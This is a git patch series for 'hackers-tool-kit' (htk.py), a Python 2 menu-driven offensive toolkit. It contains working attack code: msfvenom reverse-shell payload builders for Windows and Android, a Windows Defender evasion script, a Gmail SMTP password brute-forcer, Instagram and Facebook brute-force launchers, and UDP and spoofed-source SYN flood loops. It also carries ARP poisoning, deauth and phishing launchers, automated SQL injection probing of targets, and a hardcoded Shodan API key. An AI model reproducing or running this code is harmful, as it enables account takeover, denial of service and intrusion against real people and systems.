SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') - os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') - os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) - os.system('echo "run\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> handler.rc'.format(f)) - os.system('echo "show options\n" >> handler.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> handler.rc') - os.system('echo "services\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - found = True -mainbanner() -main() From 9401b8877c45a929119c443839d6efe328888c19 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 05:58:34 +0100 Subject: [PATCH 024/214] Add files via upload --- htk.py | 1972 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1972 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..5216985 --- /dev/null +++ b/htk.py @@ -0,0 +1,1972 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + os.system("python " + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ 